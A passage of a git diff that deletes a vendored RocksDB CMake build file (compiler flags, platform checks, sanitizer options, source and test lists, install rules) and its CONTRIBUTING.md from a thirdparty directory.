-configure_file(util/build_version.cc.in ${BUILD_VERSION_CC} @ONLY)
-add_library(build_version OBJECT ${BUILD_VERSION_CC})
-target_include_directories(build_version PRIVATE
-  ${CMAKE_CURRENT_SOURCE_DIR}/util)
-if(MSVC)
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /Zi /nologo /EHsc /GS /Gd /GR /GF /fp:precise /Zc:wchar_t /Zc:forScope /errorReport:queue")
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /FC /d2Zi+ /W3 /wd4127 /wd4800 /wd4996 /wd4351")
-else()
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -W -Wextra -Wall")
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wsign-compare -Wshadow -Wno-unused-parameter -Wno-unused-variable -Woverloaded-virtual -Wnon-virtual-dtor -Wno-missing-field-initializers")
-  if(MINGW)
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Wno-format")
-  endif()
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++11")
-  if(NOT CMAKE_BUILD_TYPE STREQUAL "Debug")
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -O2 -fno-omit-frame-pointer")
-    include(CheckCXXCompilerFlag)
-    CHECK_CXX_COMPILER_FLAG("-momit-leaf-frame-pointer" HAVE_OMIT_LEAF_FRAME_POINTER)
-    if(HAVE_OMIT_LEAF_FRAME_POINTER)
-      set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -momit-leaf-frame-pointer")
-    endif()
-  endif()
-endif()
-
-option(PORTABLE "build a portable binary" OFF)
-option(FORCE_SSE42 "force building with SSE4.2, even when PORTABLE=ON" OFF)
-if(PORTABLE)
-  # MSVC does not need a separate compiler flag to enable SSE4.2; if nmmintrin.h
-  # is available, it is available by default.
-  if(FORCE_SSE42 AND NOT MSVC)
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -msse4.2")
-  endif()
-else()
-  if(MSVC)
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /arch:AVX2")
-  else()
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -march=native")
-  endif()
-endif()
-
-set(CMAKE_REQUIRED_FLAGS ${CMAKE_CXX_FLAGS})
-include(CheckCXXSourceCompiles)
-CHECK_CXX_SOURCE_COMPILES("
-#include <cstdint>
-#include <nmmintrin.h>
-int main() {
-  volatile uint32_t x = _mm_crc32_u32(0, 0);
-}
-" HAVE_SSE42)
-if(HAVE_SSE42)
-  add_definitions(-DHAVE_SSE42)
-elseif(FORCE_SSE42)
-  message(FATAL_ERROR "FORCE_SSE42=ON but unable to compile with SSE4.2 enabled")
-endif()
-
-CHECK_CXX_SOURCE_COMPILES("
-#if defined(_MSC_VER) && !defined(__thread)
-#define __thread __declspec(thread)
-#endif
-int main() {
-  static __thread int tls;
-}
-" HAVE_THREAD_LOCAL)
-if(HAVE_THREAD_LOCAL)
-  add_definitions(-DROCKSDB_SUPPORT_THREAD_LOCAL)
-endif()
-
-option(FAIL_ON_WARNINGS "Treat compile warnings as errors" OFF)
-if(FAIL_ON_WARNINGS)
-  if(MSVC)
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} /WX")
-  else() # assume GCC
-    set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -Werror")
-  endif()
-endif()
-
-option(WITH_ASAN "build with ASAN" OFF)
-if(WITH_ASAN)
-  set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -fsanitize=address")
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address")
-  set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address")
-  if(WITH_JEMALLOC)
-    message(FATAL "ASAN does not work well with JeMalloc")
-  endif()
-endif()
-
-option(WITH_TSAN "build with TSAN" OFF)
-if(WITH_TSAN)
-  set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -fsanitize=thread -pie")
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=thread -fPIC")
-  set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=thread -fPIC")
-  if(WITH_JEMALLOC)
-    message(FATAL "TSAN does not work well with JeMalloc")
-  endif()
-endif()
-
-option(WITH_UBSAN "build with UBSAN" OFF)
-if(WITH_UBSAN)
-  add_definitions(-DROCKSDB_UBSAN_RUN)
-  set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -fsanitize=undefined")
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=undefined")
-  set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=undefined")
-  if(WITH_JEMALLOC)
-    message(FATAL "UBSAN does not work well with JeMalloc")
-  endif()
-endif()
-
-# Used to run CI build and tests so we can run faster
-set(OPTIMIZE_DEBUG_DEFAULT 0)        # Debug build is unoptimized by default use -DOPTDBG=1 to optimize
-
-if(DEFINED OPTDBG)
-   set(OPTIMIZE_DEBUG ${OPTDBG})
-else()
-   set(OPTIMIZE_DEBUG ${OPTIMIZE_DEBUG_DEFAULT})
-endif()
-
-if(MSVC)
-  if((${OPTIMIZE_DEBUG} EQUAL 1))
-    message(STATUS "Debug optimization is enabled")
-    set(CMAKE_CXX_FLAGS_DEBUG "/Oxt /${RUNTIME_LIBRARY}d")
-  else()
-    set(CMAKE_CXX_FLAGS_DEBUG "${CMAKE_CXX_FLAGS_DEBUG} /Od /RTC1 /Gm /${RUNTIME_LIBRARY}d")
-  endif()
-  set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} /Oxt /Zp8 /Gm- /Gy /${RUNTIME_LIBRARY}")
-
-  set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} /DEBUG")
-  set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} /DEBUG")
-endif()
-
-if(CMAKE_COMPILER_IS_GNUCXX)
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fno-builtin-memcmp")
-endif()
-
-option(ROCKSDB_LITE "Build RocksDBLite version" OFF)
-if(ROCKSDB_LITE)
-  add_definitions(-DROCKSDB_LITE)
-  set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fno-exceptions")
-endif()
-
-if(CMAKE_SYSTEM_NAME MATCHES "Cygwin")
-  add_definitions(-fno-builtin-memcmp -DCYGWIN)
-elseif(CMAKE_SYSTEM_NAME MATCHES "Darwin")
-  add_definitions(-DOS_MACOSX)
-  if(CMAKE_SYSTEM_PROCESSOR MATCHES arm)
-    add_definitions(-DIOS_CROSS_COMPILE -DROCKSDB_LITE)
-    # no debug info for IOS, that will make our library big
-    add_definitions(-DNDEBUG)
-  endif()
-elseif(CMAKE_SYSTEM_NAME MATCHES "Linux")
-  add_definitions(-DOS_LINUX)
-elseif(CMAKE_SYSTEM_NAME MATCHES "SunOS")
-  add_definitions(-DOS_SOLARIS)
-elseif(CMAKE_SYSTEM_NAME MATCHES "FreeBSD")
-  add_definitions(-DOS_FREEBSD)
-elseif(CMAKE_SYSTEM_NAME MATCHES "NetBSD")
-  add_definitions(-DOS_NETBSD)
-elseif(CMAKE_SYSTEM_NAME MATCHES "OpenBSD")
-  add_definitions(-DOS_OPENBSD)
-elseif(CMAKE_SYSTEM_NAME MATCHES "DragonFly")
-  add_definitions(-DOS_DRAGONFLYBSD)
-elseif(CMAKE_SYSTEM_NAME MATCHES "Android")
-  add_definitions(-DOS_ANDROID)
-elseif(CMAKE_SYSTEM_NAME MATCHES "Windows")
-  add_definitions(-DWIN32 -DOS_WIN -D_MBCS -DWIN64 -DNOMINMAX)
-  if(MINGW)
-    add_definitions(-D_WIN32_WINNT=_WIN32_WINNT_VISTA)
-  endif()
-endif()
-
-if(NOT WIN32)
-  add_definitions(-DROCKSDB_PLATFORM_POSIX -DROCKSDB_LIB_IO_POSIX)
-endif()
-
-option(WITH_FALLOCATE "build with fallocate" ON)
-
-if(WITH_FALLOCATE)
-  set(CMAKE_REQUIRED_FLAGS ${CMAKE_C_FLAGS})
-  include(CheckCSourceCompiles)
-  CHECK_C_SOURCE_COMPILES("
-#include <fcntl.h>
-#include <linux/falloc.h>
-int main() {
- int fd = open(\"/dev/null\", 0);
- fallocate(fd, FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE, 0, 1024);
-}
-" HAVE_FALLOCATE)
-  if(HAVE_FALLOCATE)
-    add_definitions(-DROCKSDB_FALLOCATE_PRESENT)
-  endif()
-endif()
-
-include(CheckFunctionExists)
-CHECK_FUNCTION_EXISTS(malloc_usable_size HAVE_MALLOC_USABLE_SIZE)
-if(HAVE_MALLOC_USABLE_SIZE)
-  add_definitions(-DROCKSDB_MALLOC_USABLE_SIZE)
-endif()
-
-include_directories(${PROJECT_SOURCE_DIR})
-include_directories(${PROJECT_SOURCE_DIR}/include)
-find_package(Threads REQUIRED)
-
-
-# Main library source code
-
-set(SOURCES
-        cache/clock_cache.cc
-        cache/lru_cache.cc
-        cache/sharded_cache.cc
-        db/builder.cc
-        db/c.cc
-        db/column_family.cc
-        db/compacted_db_impl.cc
-        db/compaction.cc
-        db/compaction_iterator.cc
-        db/compaction_job.cc
-        db/compaction_picker.cc
-        db/compaction_picker_universal.cc
-        db/convenience.cc
-        db/db_filesnapshot.cc
-        db/db_impl.cc
-        db/db_impl_write.cc
-        db/db_impl_compaction_flush.cc
-        db/db_impl_files.cc
-        db/db_impl_open.cc
-        db/db_impl_debug.cc
-        db/db_impl_experimental.cc
-        db/db_impl_readonly.cc
-        db/db_info_dumper.cc
-        db/db_iter.cc
-        db/dbformat.cc
-        db/event_helpers.cc
-        db/experimental.cc
-        db/external_sst_file_ingestion_job.cc
-        db/file_indexer.cc
-        db/flush_job.cc
-        db/flush_scheduler.cc
-        db/forward_iterator.cc
-        db/internal_stats.cc
-        db/log_reader.cc
-        db/log_writer.cc
-        db/malloc_stats.cc
-        db/managed_iterator.cc
-        db/memtable.cc
-        db/memtable_list.cc
-        db/merge_helper.cc
-        db/merge_operator.cc
-        db/range_del_aggregator.cc
-        db/repair.cc
-        db/snapshot_impl.cc
-        db/table_cache.cc
-        db/table_properties_collector.cc
-        db/transaction_log_impl.cc
-        db/version_builder.cc
-        db/version_edit.cc
-        db/version_set.cc
-        db/wal_manager.cc
-        db/write_batch.cc
-        db/write_batch_base.cc
-        db/write_controller.cc
-        db/write_thread.cc
-        env/env.cc
-        env/env_chroot.cc
-        env/env_encryption.cc
-        env/env_hdfs.cc
-        env/mock_env.cc
-        memtable/alloc_tracker.cc
-        memtable/hash_cuckoo_rep.cc
-        memtable/hash_linklist_rep.cc
-        memtable/hash_skiplist_rep.cc
-        memtable/skiplistrep.cc
-        memtable/vectorrep.cc
-        memtable/write_buffer_manager.cc
-        monitoring/histogram.cc
-        monitoring/histogram_windowing.cc
-        monitoring/instrumented_mutex.cc
-        monitoring/iostats_context.cc
-        monitoring/perf_context.cc
-        monitoring/perf_level.cc
-        monitoring/statistics.cc
-        monitoring/thread_status_impl.cc
-        monitoring/thread_status_updater.cc
-        monitoring/thread_status_util.cc
-        monitoring/thread_status_util_debug.cc
-        options/cf_options.cc
-        options/db_options.cc
-        options/options.cc
-        options/options_helper.cc
-        options/options_parser.cc
-        options/options_sanity_check.cc
-        port/stack_trace.cc
-        table/adaptive_table_factory.cc
-        table/block.cc
-        table/block_based_filter_block.cc
-        table/block_based_table_builder.cc
-        table/block_based_table_factory.cc
-        table/block_based_table_reader.cc
-        table/block_builder.cc
-        table/block_prefix_index.cc
-        table/bloom_block.cc
-        table/cuckoo_table_builder.cc
-        table/cuckoo_table_factory.cc
-        table/cuckoo_table_reader.cc
-        table/flush_block_policy.cc
-        table/format.cc
-        table/full_filter_block.cc
-        table/get_context.cc
-        table/index_builder.cc
-        table/iterator.cc
-        table/merging_iterator.cc
-        table/meta_blocks.cc
-        table/partitioned_filter_block.cc
-        table/persistent_cache_helper.cc
-        table/plain_table_builder.cc
-        table/plain_table_factory.cc
-        table/plain_table_index.cc
-        table/plain_table_key_coding.cc
-        table/plain_table_reader.cc
-        table/sst_file_writer.cc
-        table/table_properties.cc
-        table/two_level_iterator.cc
-        tools/db_bench_tool.cc
-        tools/dump/db_dump_tool.cc
-        tools/ldb_cmd.cc
-        tools/ldb_tool.cc
-        tools/sst_dump_tool.cc
-        util/arena.cc
-        util/auto_roll_logger.cc
-        util/bloom.cc
-        util/coding.cc
-        util/compaction_job_stats_impl.cc
-        util/comparator.cc
-        util/concurrent_arena.cc
-        util/crc32c.cc
-        util/delete_scheduler.cc
-        util/dynamic_bloom.cc
-        util/event_logger.cc
-        util/file_reader_writer.cc
-        util/file_util.cc
-        util/filename.cc
-        util/filter_policy.cc
-        util/hash.cc
-        util/log_buffer.cc
-        util/murmurhash.cc
-        util/random.cc
-        util/rate_limiter.cc
-        util/slice.cc
-        util/sst_file_manager_impl.cc
-        util/status.cc
-        util/status_message.cc
-        util/string_util.cc
-        util/sync_point.cc
-        util/thread_local.cc
-        util/threadpool_imp.cc
-        util/xxhash.cc
-        utilities/backupable/backupable_db.cc
-        utilities/blob_db/blob_db.cc
-        utilities/blob_db/blob_db_impl.cc
-        utilities/blob_db/blob_dump_tool.cc
-        utilities/blob_db/blob_file.cc
-        utilities/blob_db/blob_log_reader.cc
-        utilities/blob_db/blob_log_writer.cc
-        utilities/blob_db/blob_log_format.cc
-        utilities/blob_db/ttl_extractor.cc
-        utilities/cassandra/cassandra_compaction_filter.cc
-        utilities/cassandra/format.cc
-        utilities/cassandra/merge_operator.cc
-        utilities/checkpoint/checkpoint_impl.cc
-        utilities/col_buf_decoder.cc
-        utilities/col_buf_encoder.cc
-        utilities/column_aware_encoding_util.cc
-        utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc
-        utilities/date_tiered/date_tiered_db_impl.cc
-        utilities/debug.cc
-        utilities/document/document_db.cc
-        utilities/document/json_document.cc
-        utilities/document/json_document_builder.cc
-        utilities/env_mirror.cc
-        utilities/env_timed.cc
-        utilities/geodb/geodb_impl.cc
-        utilities/leveldb_options/leveldb_options.cc
-        utilities/lua/rocks_lua_compaction_filter.cc
-        utilities/memory/memory_util.cc
-        utilities/merge_operators/max.cc
-        utilities/merge_operators/put.cc
-        utilities/merge_operators/string_append/stringappend.cc
-        utilities/merge_operators/string_append/stringappend2.cc
-        utilities/merge_operators/uint64add.cc
-        utilities/option_change_migration/option_change_migration.cc
-        utilities/options/options_util.cc
-        utilities/persistent_cache/block_cache_tier.cc
-        utilities/persistent_cache/block_cache_tier_file.cc
-        utilities/persistent_cache/block_cache_tier_metadata.cc
-        utilities/persistent_cache/persistent_cache_tier.cc
-        utilities/persistent_cache/volatile_tier_impl.cc
-        utilities/redis/redis_lists.cc
-        utilities/simulator_cache/sim_cache.cc
-        utilities/spatialdb/spatial_db.cc
-        utilities/table_properties_collectors/compact_on_deletion_collector.cc
-        utilities/transactions/optimistic_transaction_db_impl.cc
-        utilities/transactions/optimistic_transaction.cc
-        utilities/transactions/transaction_base.cc
-        utilities/transactions/pessimistic_transaction_db.cc
-        utilities/transactions/transaction_db_mutex_impl.cc
-        utilities/transactions/pessimistic_transaction.cc
-        utilities/transactions/transaction_lock_mgr.cc
-        utilities/transactions/transaction_util.cc
-        utilities/transactions/write_prepared_txn.cc
-        utilities/ttl/db_ttl_impl.cc
-        utilities/write_batch_with_index/write_batch_with_index.cc
-        utilities/write_batch_with_index/write_batch_with_index_internal.cc
-        $<TARGET_OBJECTS:build_version>)
-
-if(WIN32)
-  list(APPEND SOURCES
-    port/win/io_win.cc
-    port/win/env_win.cc
-    port/win/env_default.cc
-    port/win/port_win.cc
-    port/win/win_logger.cc
-    port/win/win_thread.cc
-    port/win/xpress_win.cc)
-	
-if(WITH_JEMALLOC)
-  list(APPEND SOURCES
-    port/win/win_jemalloc.cc)
-endif()
-	
-else()
-  list(APPEND SOURCES
-    port/port_posix.cc
-    env/env_posix.cc
-    env/io_posix.cc)
-endif()
-
-set(ROCKSDB_STATIC_LIB rocksdb${ARTIFACT_SUFFIX})
-# commented out to avoid building the shared lib
-#set(ROCKSDB_SHARED_LIB rocksdb-shared${ARTIFACT_SUFFIX})
-set(ROCKSDB_IMPORT_LIB ${ROCKSDB_SHARED_LIB})
-if(WIN32)
-  #set(SYSTEM_LIBS ${SYSTEM_LIBS} shlwapi.lib Rpcrt4.lib)
-  set(SYSTEM_LIBS ${SYSTEM_LIBS}  Rpcrt4.lib)
-  set(LIBS ${ROCKSDB_STATIC_LIB} ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
-else()
-  set(SYSTEM_LIBS ${CMAKE_THREAD_LIBS_INIT})
-  set(LIBS ${ROCKSDB_STATIC_LIB} ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
-# commented out to avoid building the shared lib
-# as there is no reason
-#add_library(${ROCKSDB_SHARED_LIB} SHARED ${SOURCES})
-
-# target_link_libraries(${ROCKSDB_SHARED_LIB}
-#    ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
-#  set_target_properties(${ROCKSDB_SHARED_LIB} PROPERTIES
-#                        LINKER_LANGUAGE CXX
-#                        VERSION ${ROCKSDB_VERSION}
-#                        SOVERSION ${ROCKSDB_VERSION_MAJOR}
-#                        CXX_STANDARD 11
-#                        OUTPUT_NAME "rocksdb")
-endif()
-
-option(WITH_LIBRADOS "Build with librados" OFF)
-if(WITH_LIBRADOS)
-  list(APPEND SOURCES
-    utilities/env_librados.cc)
-  list(APPEND THIRDPARTY_LIBS rados)
-endif()
-
-add_library(${ROCKSDB_STATIC_LIB} STATIC ${SOURCES})
-target_link_libraries(${ROCKSDB_STATIC_LIB}
-  ${THIRDPARTY_LIBS} ${SYSTEM_LIBS})
-
-if(WIN32)
-#  add_library(${ROCKSDB_IMPORT_LIB} SHARED ${SOURCES})
-  #target_link_libraries(${ROCKSDB_IMPORT_LIB}  ${SYSTEM_LIBS})
-  #set_target_properties(${ROCKSDB_IMPORT_LIB} PROPERTIES
-   # COMPILE_DEFINITIONS "ROCKSDB_DLL;ROCKSDB_LIBRARY_EXPORTS")
-  if(MSVC)
-    set_target_properties(${ROCKSDB_STATIC_LIB} PROPERTIES
-      COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/${ROCKSDB_STATIC_LIB}.pdb")
-    #set_target_properties(${ROCKSDB_IMPORT_LIB} PROPERTIES
-      #COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/${ROCKSDB_IMPORT_LIB}.pdb")
-  endif()
-endif()
-
-option(WITH_JNI "build with JNI" OFF)
-if(WITH_JNI OR JNI)
-  message(STATUS "JNI library is enabled")
-  add_subdirectory(${CMAKE_CURRENT_SOURCE_DIR}/java)
-else()
-  message(STATUS "JNI library is disabled")
-endif()
-
-# Installation and packaging
-if(WIN32)
-  option(ROCKSDB_INSTALL_ON_WINDOWS "Enable install target on Windows" OFF)
-endif()
-if(NOT WIN32 OR ROCKSDB_INSTALL_ON_WINDOWS)
-  if(CMAKE_INSTALL_PREFIX_INITIALIZED_TO_DEFAULT)
-    if(${CMAKE_SYSTEM_NAME} STREQUAL "Linux")
-      # Change default installation prefix on Linux to /usr
-      set(CMAKE_INSTALL_PREFIX /usr CACHE PATH "Install path prefix, prepended onto install directories." FORCE)
-    endif()
-  endif()
-
-  include(GNUInstallDirs)
-  include(CMakePackageConfigHelpers)
-
-  set(package_config_destination ${CMAKE_INSTALL_LIBDIR}/cmake/rocksdb)
-
-  configure_package_config_file(
-    ${CMAKE_SOURCE_DIR}/cmake/RocksDBConfig.cmake.in RocksDBConfig.cmake
-    INSTALL_DESTINATION ${package_config_destination}
-  )
-
-  write_basic_package_version_file(
-    RocksDBConfigVersion.cmake
-    VERSION ${ROCKSDB_VERSION}
-    COMPATIBILITY SameMajorVersion
-  )
-
-  install(DIRECTORY include/rocksdb COMPONENT devel DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}")
-
-  install(
-    TARGETS ${ROCKSDB_STATIC_LIB}
-    EXPORT RocksDBTargets
-    COMPONENT devel
-    ARCHIVE DESTINATION "${CMAKE_INSTALL_LIBDIR}"
-    INCLUDES DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}"
-  )
-
-  install(
-    TARGETS ${ROCKSDB_SHARED_LIB}
-    EXPORT RocksDBTargets
-    COMPONENT runtime
-    RUNTIME DESTINATION "${CMAKE_INSTALL_BINDIR}"
-    LIBRARY DESTINATION "${CMAKE_INSTALL_LIBDIR}"
-    INCLUDES DESTINATION "${CMAKE_INSTALL_INCLUDEDIR}"
-  )
-
-  install(
-    EXPORT RocksDBTargets
-    COMPONENT devel
-    DESTINATION ${package_config_destination}
-    NAMESPACE RocksDB::
-  )
-
-  install(
-    FILES
-    ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfig.cmake
-    ${CMAKE_CURRENT_BINARY_DIR}/RocksDBConfigVersion.cmake
-    COMPONENT devel
-    DESTINATION ${package_config_destination}
-  )
-endif()
-
-option(WITH_TESTS "build with tests" ON)
-if(WITH_TESTS)
-  set(TESTS
-        cache/cache_test.cc
-        cache/lru_cache_test.cc
-        db/column_family_test.cc
-        db/compact_files_test.cc
-        db/compaction_iterator_test.cc
-        db/compaction_job_stats_test.cc
-        db/compaction_job_test.cc
-        db/compaction_picker_test.cc
-        db/comparator_db_test.cc
-        db/corruption_test.cc
-        db/cuckoo_table_db_test.cc
-        db/db_basic_test.cc
-        db/db_blob_index_test.cc
-        db/db_block_cache_test.cc
-        db/db_bloom_filter_test.cc
-        db/db_compaction_filter_test.cc
-        db/db_compaction_test.cc
-        db/db_dynamic_level_test.cc
-        db/db_flush_test.cc
-        db/db_inplace_update_test.cc
-        db/db_io_failure_test.cc
-        db/db_iter_test.cc
-        db/db_iterator_test.cc
-        db/db_log_iter_test.cc
-        db/db_memtable_test.cc
-        db/db_merge_operator_test.cc
-        db/db_options_test.cc
-        db/db_properties_test.cc
-        db/db_range_del_test.cc
-        db/db_sst_test.cc
-        db/db_statistics_test.cc
-        db/db_table_properties_test.cc
-        db/db_tailing_iter_test.cc
-        db/db_test.cc
-        db/db_test2.cc
-        db/db_universal_compaction_test.cc
-        db/db_wal_test.cc
-        db/db_write_test.cc
-        db/dbformat_test.cc
-        db/deletefile_test.cc
-        db/external_sst_file_basic_test.cc
-        db/external_sst_file_test.cc
-        db/fault_injection_test.cc
-        db/file_indexer_test.cc
-        db/filename_test.cc
-        db/flush_job_test.cc
-        db/listener_test.cc
-        db/log_test.cc
-        db/manual_compaction_test.cc
-        db/memtable_list_test.cc
-        db/merge_helper_test.cc
-        db/merge_test.cc
-        db/options_file_test.cc
-        db/perf_context_test.cc
-        db/plain_table_db_test.cc
-        db/prefix_test.cc
-        db/repair_test.cc
-        db/table_properties_collector_test.cc
-        db/version_builder_test.cc
-        db/version_edit_test.cc
-        db/version_set_test.cc
-        db/wal_manager_test.cc
-        db/write_batch_test.cc
-        db/write_callback_test.cc
-        db/write_controller_test.cc
-        env/env_basic_test.cc
-        env/env_test.cc
-        env/mock_env_test.cc
-        memtable/inlineskiplist_test.cc
-        memtable/skiplist_test.cc
-        memtable/write_buffer_manager_test.cc
-        monitoring/histogram_test.cc
-        monitoring/iostats_context_test.cc
-        monitoring/statistics_test.cc
-        options/options_settable_test.cc
-        options/options_test.cc
-        table/block_based_filter_block_test.cc
-        table/block_test.cc
-        table/cleanable_test.cc
-        table/cuckoo_table_builder_test.cc
-        table/cuckoo_table_reader_test.cc
-        table/full_filter_block_test.cc
-        table/merger_test.cc
-        table/table_test.cc
-        tools/ldb_cmd_test.cc
-        tools/reduce_levels_test.cc
-        tools/sst_dump_test.cc
-        util/arena_test.cc
-        util/auto_roll_logger_test.cc
-        util/autovector_test.cc
-        util/bloom_test.cc
-        util/coding_test.cc
-        util/crc32c_test.cc
-        util/delete_scheduler_test.cc
-        util/dynamic_bloom_test.cc
-        util/event_logger_test.cc
-        util/file_reader_writer_test.cc
-        util/filelock_test.cc
-        util/hash_test.cc
-        util/rate_limiter_test.cc
-        util/slice_transform_test.cc
-        util/timer_queue_test.cc
-        util/thread_list_test.cc
-        util/thread_local_test.cc
-        utilities/backupable/backupable_db_test.cc
-        utilities/blob_db/blob_db_test.cc
-        utilities/cassandra/cassandra_functional_test.cc
-        utilities/cassandra/cassandra_format_test.cc
-        utilities/cassandra/cassandra_row_merge_test.cc
-        utilities/cassandra/cassandra_serialize_test.cc
-        utilities/checkpoint/checkpoint_test.cc
-        utilities/column_aware_encoding_test.cc
-        utilities/date_tiered/date_tiered_test.cc
-        utilities/document/document_db_test.cc
-        utilities/document/json_document_test.cc
-        utilities/geodb/geodb_test.cc
-        utilities/lua/rocks_lua_test.cc
-        utilities/memory/memory_test.cc
-        utilities/merge_operators/string_append/stringappend_test.cc
-        utilities/object_registry_test.cc
-        utilities/option_change_migration/option_change_migration_test.cc
-        utilities/options/options_util_test.cc
-        utilities/persistent_cache/hash_table_test.cc
-        utilities/persistent_cache/persistent_cache_test.cc
-        utilities/redis/redis_lists_test.cc
-        utilities/spatialdb/spatial_db_test.cc
-        utilities/simulator_cache/sim_cache_test.cc
-        utilities/table_properties_collectors/compact_on_deletion_collector_test.cc
-        utilities/transactions/optimistic_transaction_test.cc
-        utilities/transactions/transaction_test.cc
-        utilities/ttl/ttl_test.cc
-        utilities/write_batch_with_index/write_batch_with_index_test.cc
-  )
-  if(WITH_LIBRADOS)
-    list(APPEND TESTS utilities/env_librados_test.cc)
-  endif()
-
- 
-  # For test util library that is build only in DEBUG mode
-  # and linked to tests. Add test only code that is not #ifdefed for Release here.
-  set(TESTUTIL_SOURCE
-      db/db_test_util.cc
-      monitoring/thread_status_updater_debug.cc
-      table/mock_table.cc
-      util/fault_injection_test_env.cc
-      utilities/cassandra/test_utils.cc
-  )
-  # test utilities are only build in debug
-  enable_testing()
-  add_custom_target(check COMMAND ${CMAKE_CTEST_COMMAND})
-  set(TESTUTILLIB testutillib${ARTIFACT_SUFFIX})
-  add_library(${TESTUTILLIB} STATIC ${TESTUTIL_SOURCE})
-  if(MSVC)
-    set_target_properties(${TESTUTILLIB} PROPERTIES COMPILE_FLAGS "/Fd${CMAKE_CFG_INTDIR}/testutillib${ARTIFACT_SUFFIX}.pdb")
-  endif()
-  set_target_properties(${TESTUTILLIB}
-        PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
-        EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
-        EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
-        )
-
-  # Tests are excluded from Release builds
-  #set(TEST_EXES ${TESTS})
-
-  # while tests are not built, we want to ensure that any reference to gtest is removed in case the user
-  # builds rocksdb manually from our third party directory
-  #foreach(sourcefile ${TEST_EXES})
-  #    get_filename_component(exename ${sourcefile} NAME_WE)
-  #    add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile}
-  #      $<TARGET_OBJECTS:testharness>)
-  #    set_target_properties(${exename}${ARTIFACT_SUFFIX}
-  #      PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
-  #      EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
-  #      EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
-  #      )
-  #    target_link_libraries(${exename}${ARTIFACT_SUFFIX} testutillib${ARTIFACT_SUFFIX} gtest ${LIBS})
-  #    if(NOT "${exename}" MATCHES "db_sanity_test")
-  #      add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX})
-  #      add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
-  #    endif()
-  #endforeach(sourcefile ${TEST_EXES})
-
-  # C executables must link to a shared object
-  set(C_TESTS db/c_test.c)
-  set(C_TEST_EXES ${C_TESTS})
-
-  foreach(sourcefile ${C_TEST_EXES})
-      string(REPLACE ".c" "" exename ${sourcefile})
-      string(REGEX REPLACE "^((.+)/)+" "" exename ${exename})
-      add_executable(${exename}${ARTIFACT_SUFFIX} ${sourcefile})
-      set_target_properties(${exename}${ARTIFACT_SUFFIX}
-        PROPERTIES EXCLUDE_FROM_DEFAULT_BUILD_RELEASE 1
-        EXCLUDE_FROM_DEFAULT_BUILD_MINRELEASE 1
-        EXCLUDE_FROM_DEFAULT_BUILD_RELWITHDEBINFO 1
-        )
-      target_link_libraries(${exename}${ARTIFACT_SUFFIX} ${ROCKSDB_IMPORT_LIB} testutillib${ARTIFACT_SUFFIX})
-      add_test(NAME ${exename} COMMAND ${exename}${ARTIFACT_SUFFIX})
-      add_dependencies(check ${exename}${ARTIFACT_SUFFIX})
-  endforeach(sourcefile ${C_TEST_EXES})
-endif()
diff --git a/thirdparty/rocksdb/CONTRIBUTING.md b/thirdparty/rocksdb/CONTRIBUTING.md
deleted file mode 100644
index b8b1a41..0000000
--- a/thirdparty/rocksdb/CONTRIBUTING.md
+++ /dev/null
@@ -1,14 +0,0 @@
-# Contributing to RocksDB
-
-## Contributor License Agreement ("CLA")
-
-In order to accept your pull request, we need you to submit a CLA. You
-only need to do this once, so if you've done this for another Facebook
-open source project, you're good to go. If you are submitting a pull
-request for the first time, just let us know that you have completed
-the CLA and we can cross-check with your GitHub username.
-
-Complete your CLA here: <https://code.facebook.com/cla>
-
-If you prefer to sign a paper copy, we can send you a PDF.  Send us an 
-e-mail or create a new github issue to request the CLA in PDF format.
